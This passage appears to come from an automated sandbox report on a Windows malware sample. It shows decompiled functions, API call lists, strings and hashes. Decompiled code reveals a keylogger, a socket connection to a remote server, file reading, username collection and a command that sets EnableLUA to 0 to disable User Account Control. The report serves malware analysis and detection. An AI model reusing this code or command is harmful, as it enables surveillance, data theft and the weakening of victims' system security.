                                    • Part of subcall function 00409EAA: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,00000000,0000022C,00000000,?,00000002,00000000), ref: 00409F1E
                                    • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409F99
                                    • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FA9
                                    • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FB6
                                    • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4), ref: 00409FC6
                                    • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004166F4,00000000), ref: 00409FD3
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?), ref: 0040D78E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040D798
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004F), ref: 0040D7AF
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E69B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@0@D@2@@std@@Hstd@@V?$basic_string@$??1?$basic_string@$V10@0@$??0?$basic_string@V10@$Process32$CreateCurrentD@1@@FirstG@1@@G@2@@std@@G@std@@NextProcessSnapshotToolhelp32V01@@_itoa
                                  • String ID:
                                  • API String ID: 1707565870-0
                                  • Opcode ID: df7207b37aa3fc83145d442fa6c541f7260c2bf86f695acf5d840247295bf7f5
                                  • Instruction ID: 286f1569ef994b2bf272d8202e8d00d479d3e157814ab9f0be6f7aa08cfd563f
                                  • Opcode Fuzzy Hash: df7207b37aa3fc83145d442fa6c541f7260c2bf86f695acf5d840247295bf7f5
                                  • Instruction Fuzzy Hash: CD01217291021CEBCB05ABE1EC4DDEE7738FBA4306F00443AF506A7091EB745949CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410E53, Relevance: 10.6, APIs: 7, Instructions: 64COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 24%
                                  			E00410E53(void* __eflags, char _a4) {
				char _v20;
				char _v36;
				char _v52;
				void* _t16;
				char* _t18;
				void* _t19;
				void* _t36;

				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z();
				E00402038(0x41c130);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				E0040209B(0x41c130,  &_a4);
				_t16 = E00412855(0x41c130,  &_v36, E004113C9( &_v52));
				_t18 =  &_v20;
				L00414140();
				L00414140();
				_t19 = E004020C2(0x41c130, 0x34, _t36 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t18, _t18,  &_a4, 0x41b310, _t16, 0x41c130);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				E00402118(0x41c130, E00410F04);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t19;
			}










                                  0x00410e65
                                  0x00410e72
                                  0x00410e83
                                  0x00410e84
                                  0x00410e85
                                  0x00410e86
                                  0x00410e87
                                  0x00410e9a
                                  0x00410eac
                                  0x00410eb0
                                  0x00410eba
                                  0x00410ec6
                                  0x00410ed0
                                  0x00410ed9
                                  0x00410ee2
                                  0x00410eef
                                  0x00410ef7
                                  0x00410f03

                                  APIs
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00410E65
                                    • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                    • Part of subcall function 004113C9: OpenSCManagerA.ADVAPI32(00000000,00000000,00000004), ref: 004113D9
                                    • Part of subcall function 004113C9: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 004113F2
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,00000000,?,?,00000000,?), ref: 00410EB0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,?), ref: 00410EBA
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000034,?,?,?,?,00000000,?), ref: 00410ED0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410ED9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410EE2
                                    • Part of subcall function 00402118: CreateThread.KERNEL32(00000000,00000000,00402137,?,00000000,00000000), ref: 0040212D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410EF7
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@$D@2@@0@Hstd@@V01@@V10@0@V?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@CreateD@1@@G@1@@ManagerOpenThreadV01@connectsocket
                                  • String ID:
                                  • API String ID: 2339118965-0
                                  • Opcode ID: 77364c1b16f72e8442b5cf229b6c9932876b50d99ed1b33d7c1a183c2fff5cdd
                                  • Instruction ID: 1193976e1187dff15876f75262123416920ecc17f0a83cfc990a5670802f72a4
                                  • Opcode Fuzzy Hash: 77364c1b16f72e8442b5cf229b6c9932876b50d99ed1b33d7c1a183c2fff5cdd
                                  • Instruction Fuzzy Hash: 1811A772A0021CA7CB00FBA1EC4ACEF776CEA84344704443EFE02E7191DA785948C7E8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412881, Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 43%
                                  			E00412881(void* __eax, intOrPtr _a4, void* _a8, char _a11) {
				char _v20;
				void* _t15;
				void* _t18;
				signed int _t20;
				void* _t25;
				signed int _t28;
				signed int _t29;
				signed int _t36;
				void* _t46;
				signed int _t57;
				void* _t58;

				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				_t57 = __eax + 2;
				_t15 = _t57 + _t57;
				L00413E84();
				_t25 = _t15;
				_t28 = _t57;
				_t46 = _t25;
				_t29 = _t28 >> 2;
				_t18 = memset(_t46 + _t29, memset(_t46, 0, _t29 << 2), (_t28 & 0x00000003) << 0);
				_t6 = _t57 - 2; // 0x0
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t15);
				_t58 = _t18;
				_t36 = _t6 >> 2;
				_t20 = memcpy(_t25, _t58, _t36 << 2);
				memcpy(_t58 + _t36 + _t36, _t58, _t20 & 0x00000003);
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t25,  &_a11);
				L00413EBE();
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z( &_v20, _t25);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _a4;
			}














                                  0x0041288d
                                  0x00412896
                                  0x00412897
                                  0x0041289b
                                  0x004128a1
                                  0x004128a3
                                  0x004128a9
                                  0x004128ab
                                  0x004128b5
                                  0x004128ba
                                  0x004128bd
                                  0x004128c3
                                  0x004128cb
                                  0x004128ce
                                  0x004128d9
                                  0x004128df
                                  0x004128e6
                                  0x004128f3
                                  0x004128fc
                                  0x00412909

                                  APIs
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                  • ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                  • ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??0?$basic_string@D@2@@std@@D@std@@$??1?$basic_string@??2@??3@?c_str@?$basic_string@?length@?$basic_string@G@1@@V01@@
                                  • String ID:
                                  • API String ID: 391609400-0
                                  • Opcode ID: c177d2df2063bbdc2060a0222ce48b64abd3706d1ceb561fbd7f54770638c6aa
                                  • Instruction ID: aeeabeca61c13fa181a61ba6e56d16b1543aaa328dd705508f0d2aa2ccd85a4a
                                  • Opcode Fuzzy Hash: c177d2df2063bbdc2060a0222ce48b64abd3706d1ceb561fbd7f54770638c6aa
                                  • Instruction Fuzzy Hash: A50180326005199B8B08EF68EC958EFB7EAFB88255744443EF907C7390DE709A05CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405D50, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 49COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Stopped,?,0041BCB0,?,?,004054E4), ref: 00405D76
                                    • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                    • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                    • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                    • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                    • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                    • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                    • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                    • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Stopped,?,0041BCB0,?,?,004054E4), ref: 00405D8D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00405DA1
                                  • UnhookWindowsHookEx.USER32(00000000), ref: 00405DC0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@V01@$D@2@@0@Hstd@@V?$basic_string@Y?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@EventHookLocalTimeUnhookV01@@V10@V10@@Windowsfreemallocsprintf
                                  • String ID: Offline Keylogger Stopped$[INFO]
                                  • API String ID: 2222684746-1731565019
                                  • Opcode ID: 73c64669d0e90f52680bcd42a3afb3a3acb1e5eb000d97594ebbd2d1d962b6da
                                  • Instruction ID: e64c4fb295ac971b427419d3758f0b97408fd66a05d8179c7aec1af0dcca75a5
                                  • Opcode Fuzzy Hash: 73c64669d0e90f52680bcd42a3afb3a3acb1e5eb000d97594ebbd2d1d962b6da
                                  • Instruction Fuzzy Hash: 0C01D674910B046BE7107725C84D7FB7EBCDF81750F44846BE842922C1D7B869458FAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040A0E1, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 39processCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 50%
                                  			E0040A0E1() {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v88;
				signed int _t17;

				_t17 = 0x11;
				memset( &_v88, 0, _t17 << 2);
				_v88.cb = 0x44;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				CreateProcessA("C:\\Windows\\System32\\cmd.exe", "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20);
				CloseHandle(_v20);
				return CloseHandle(_v20.hThread);
			}






                                  0x0040a0ed
                                  0x0040a0f1
                                  0x0040a0f6
                                  0x0040a0fd
                                  0x0040a0fe
                                  0x0040a0ff
                                  0x0040a100
                                  0x0040a11f
                                  0x0040a12e
                                  0x0040a138

                                  APIs
                                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?,0041BA38,0041BCB0), ref: 0040A11F
                                  • CloseHandle.KERNEL32(?), ref: 0040A12E
                                  • CloseHandle.KERNEL32(?), ref: 0040A133
                                  Strings
                                  • D, xrefs: 0040A0F6
                                  • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040A115
                                  • C:\Windows\System32\cmd.exe, xrefs: 0040A11A
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandle$CreateProcess
                                  • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe$D
                                  • API String ID: 2922976086-1747066916
                                  • Opcode ID: 34e80a7266f22886247dd1c59806a28bf3f5ead1ecfd7117f941ad378ce73be4
                                  • Instruction ID: 0928101be9c5a4b5cd6cbd2924aec545eff454ae04b53be068f3b7a54285d6aa
                                  • Opcode Fuzzy Hash: 34e80a7266f22886247dd1c59806a28bf3f5ead1ecfd7117f941ad378ce73be4
                                  • Instruction Fuzzy Hash: 5EF054B2A00518BEFB019BE8DC05EFFBB7DE784700F114436FA11F6060D6746D088AA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405532, Relevance: 9.1, APIs: 6, Instructions: 59sleepfileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 59%
                                  			E00405532(void* __ecx) {
				signed int _t8;
				WCHAR* _t9;
				long _t12;
				void* _t21;
				void* _t22;
				void* _t28;

				_t8 =  *0x41b988; // 0x0
				_t9 = _t8 |  *0x41b98c;
				_t22 = __ecx;
				if(_t9 != 0) {
					 *((char*)(__ecx + 0x30)) = 0;
					do {
						__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
						_t9 = CreateFileW(_t9, 0x80000000, 7, 0, 3, 0x80, 0);
						_t21 = _t9;
						if(_t21 == 0xffffffff) {
							 *((char*)(_t22 + 0x30)) = 0;
						} else {
							_t12 = GetFileSize(_t21, 0);
							_t28 = 0 -  *0x41b98c; // 0x0
							if(_t28 >= 0 && (_t28 > 0 || _t12 >=  *0x41b988)) {
								 *((char*)(_t22 + 0x30)) = 1;
								if( *((intOrPtr*)(_t22 + 0x3c)) != 0) {
									E00405D50(_t22);
								}
								Sleep(0x2710);
							}
							_t9 = CloseHandle(_t21);
						}
					} while ( *((char*)(_t22 + 0x30)) == 1);
					if( *((intOrPtr*)(_t22 + 0x3c)) == 0 &&  *0x41b154 == 0x31) {
						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z(_t22 + 0x54);
						return E00405180(_t22);
					}
				}
				return _t9;
			}









                                  0x00405532
                                  0x00405538
                                  0x00405540
                                  0x00405542
                                  0x0040554a
                                  0x0040554d
                                  0x00405562
                                  0x00405569
                                  0x0040556f
                                  0x00405574
                                  0x004055b6
                                  0x00405576
                                  0x00405578
                                  0x00405580
                                  0x00405586
                                  0x00405595
                                  0x00405599
                                  0x0040559d
                                  0x0040559d
                                  0x004055a7
                                  0x004055a7
                                  0x004055ae
                                  0x004055ae
                                  0x004055b9
                                  0x004055c2
                                  0x004055d6
                                  0x00000000
                                  0x004055de
                                  0x004055c2
                                  0x004055e6

                                  APIs
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(80000000,00000007,00000000,00000003,00000080,00000000,00415664,?,0041BCB0,00405614), ref: 00405562
                                  • CreateFileW.KERNEL32(00000000), ref: 00405569
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00405578
                                  • Sleep.KERNEL32(00002710), ref: 004055A7
                                  • CloseHandle.KERNEL32(00000000), ref: 004055AE
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004055D6
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileG@2@@std@@G@std@@U?$char_traits@V?$allocator@$??0?$basic_string@?c_str@?$basic_string@CloseCreateHandleSizeSleepV01@@
                                  • String ID:
                                  • API String ID: 3524115370-0
                                  • Opcode ID: 9bf14a5df145d5f41df20096633609b72b1ec63d739e420429c19bf5600fe5fe
                                  • Instruction ID: 936fdab3816807404b6184885be68073097791833a96003579df1cad0b33865a
                                  • Opcode Fuzzy Hash: 9bf14a5df145d5f41df20096633609b72b1ec63d739e420429c19bf5600fe5fe
                                  • Instruction Fuzzy Hash: 2B115670181E40BFDB216334AD8C7AB7BA9EB41300F40843BE582936D0C7B868448F1C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412DDF, Relevance: 9.0, APIs: 6, Instructions: 48fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E00412DDF(void _a4, void* _a8) {
				struct _OVERLAPPED* _t13;
				void* _t16;
				long _t17;
				void* _t19;

				_t13 = 0;
				_t19 = CreateFileW(_a4, 0x80000000, 3, 0, 3, 0x80, 0);
				if(_t19 != 0xffffffff) {
					_t17 = GetFileSize(_t19, 0);
					__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID@Z(_t17, 0, _t16);
					_t8 =  &_a4;
					_a4 = 0;
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					if(ReadFile(_t19,  &_a4, _t17, _t8, 0) != 0) {
						_t13 = 1;
					}
					CloseHandle(_t19);
					return _t13;
				}
				return 0;
			}







                                  0x00412de3
                                  0x00412dff
                                  0x00412e04
                                  0x00412e16
                                  0x00412e1a
                                  0x00412e23
                                  0x00412e29
                                  0x00412e2c
                                  0x00412e3d
                                  0x00412e3f
                                  0x00412e3f
                                  0x00412e42
                                  0x00000000
                                  0x00412e48
                                  0x00000000

                                  APIs
                                  • CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E0D
                                  • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID@Z.MSVCP60(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E1A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00000000,?,?,00409C9F,00000000), ref: 00412E2C
                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E34
                                  • CloseHandle.KERNEL32(00000000,?,00409C9F,00000000), ref: 00412E42
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@?resize@?$basic_string@CloseCreateHandleReadSize
                                  • String ID:
                                  • API String ID: 2061410294-0
                                  • Opcode ID: fa4d467d17345bb80924ef3185be0a48566cc4f8ae095e8dcd31704ebaf267b8
                                  • Instruction ID: e286a7eceb6258eec42f82ecdc09f82327f8599071822df4e1fbbe5006a6f2d0
                                  • Opcode Fuzzy Hash: fa4d467d17345bb80924ef3185be0a48566cc4f8ae095e8dcd31704ebaf267b8
                                  • Instruction Fuzzy Hash: EBF08171241518BFEB125F60EC88FFB7B6CEB867A4F108126FD15D6290CA744E418668
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412163, Relevance: 9.0, APIs: 6, Instructions: 41COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 28%
                                  			E00412163(intOrPtr _a4) {
				char _v5;
				char _v12;
				long _v16;
				char _v32;
				void* _v48;
				char _v80;
				short _v592;
				char* _t23;
				char* _t25;

				_v12 = 0x10;
				 *0x41c1e8(1,  &_v80,  &_v12);
				_v16 = 0x100;
				GetUserNameW( &_v592,  &_v16);
				_t23 =  &_v5;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z("/", _t23,  &_v592);
				_t25 =  &_v32;
				L0041416A();
				L00414146();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_a4, _t25, _t25,  &_v80, _t23);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _a4;
			}












                                  0x0041216f
                                  0x0041217d
                                  0x00412186
                                  0x00412195
                                  0x004121a5
                                  0x004121ae
                                  0x004121b9
                                  0x004121bd
                                  0x004121c9
                                  0x004121d4
                                  0x004121dd
                                  0x004121e7

                                  APIs
                                  • GetUserNameW.ADVAPI32(?,?), ref: 00412195
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416C08,?,?), ref: 004121AE
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 004121BD
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(00000010,00000000), ref: 004121C9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004121D4
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004121DD
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
